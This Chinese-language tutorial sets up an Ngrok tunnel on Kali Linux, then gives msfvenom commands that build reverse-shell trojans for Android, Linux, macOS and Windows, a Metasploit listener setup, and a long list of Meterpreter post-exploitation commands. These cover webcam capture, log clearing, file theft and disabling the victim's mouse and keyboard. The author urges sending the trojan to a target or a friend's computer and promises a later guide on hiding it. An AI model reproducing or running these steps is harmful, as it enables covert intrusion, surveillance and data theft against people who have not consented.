注:本文章仅用于娱乐,请按照《中华人民共和国网络安全法》规范使用
什么是内网穿透
内网穿透,也被称为NAT(网络地址转换)穿透或内网映射,是一种将本地网络服务暴露给互联网的技术。简单来说,就是让处于局域网(内网)内的设备能够通过互联网进行通信,实现远程访问和操作。
原理如下
- 端口映射:在路由器级别进行配置,将外部端口的请求转发到内网设备上的特定端口。
- 反向代理:使用反向代理服务器接收外部请求,并将其转发到内网服务上。
- VPN:在网络中创建一个加密的“隧道”,允许远程设备安全地访问内网资源。
常见的内网穿透工具有FRP,NPS,花生壳,Ngrok等,这里就用Ngrok进行简单示范
实操:
准备工具:KALI LINUX
1:进入Ngrok官网(http://www.ngrok.cc)
注册帐号之后点隧道管理——开通隧道——划拉到最底下有免费的(白嫖党狂喜)
之后开始配置
隧道协议选择tcp(足够用了)名称随便起一个,IP和端口填你kali的端口,主机的也行(麻烦)不过填KALi的ip和端口的话要把你网路模式改到NAT模式
填写好之后保存,然后安装Ngrok客户端(http://www.ngrok.cc)
下载好之后拖到kali里面,在里面解压
解压指令
unzip 压缩包名称
进入解压好的目录并开始运行
运行代码
./sunny --server=xxx.xxx.com:端口[赠送域名还有端口] --key=[隧道id]
至此,大功告成,我们可以找一台不在同一个局域网的主机ping一下
渗透测试
我们可以随便搞点什么试验一下,比如说用cs,或者用MSF生成外网木马程序之类的
这里我附上msf生成木马程序的指令
安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520 -o /shell.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520-f elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=0.0.0.0 LPORT=520 -f macho > shell.macho
windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=0.0.0.0 lport=520 -f exe -o /root/shell.exe
注意lhost填隧道上面的域名,lport填TCP域名后面的端口
木马原理也很简单
生成好木马之后打开msfconsole设置攻击载荷
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 本机ip
set LPORT 在隧道上填的端口
注意不同的系统有不同的攻击载荷摘不到的话直接set+生成木马指令后面那一坨
之后就run吧(开始监听)然后吧木马发到靶机或者你朋友电脑上(记得进行隐藏后期我会出教程)
因为我的靶机被奇安信天擎整崩了不方便演示大家可以自行尝试
附上msfconsole后渗透指令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了
background # 让meterpreter处于后台模式
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
getwd 或者pwd # 查看当前工作目录
ls
cd
cat c:\\lltest\\lltestpasswd.txt # 查看文件内容
upload /tmp/hack.txt C:\\lltest # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件 没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2 #只能在当前目录下创建文件夹
rmdir lltest2 #只能删除当前目录下文件夹
getlwd 或者 lpwd #操作攻击者主机 查看当前目录
lcd /tmp #操作攻击者主机 切换目录
search -f *secret*.doc #全局搜索secret.doc这个文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
uictl enable mouse #开启鼠标
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
由于时间安排这段时间并不会出太多笔记,之后我会给大家分享HW经验,面试题,个人网站搭建,包括最近很火的单片机制作小智AI等
完结撒花~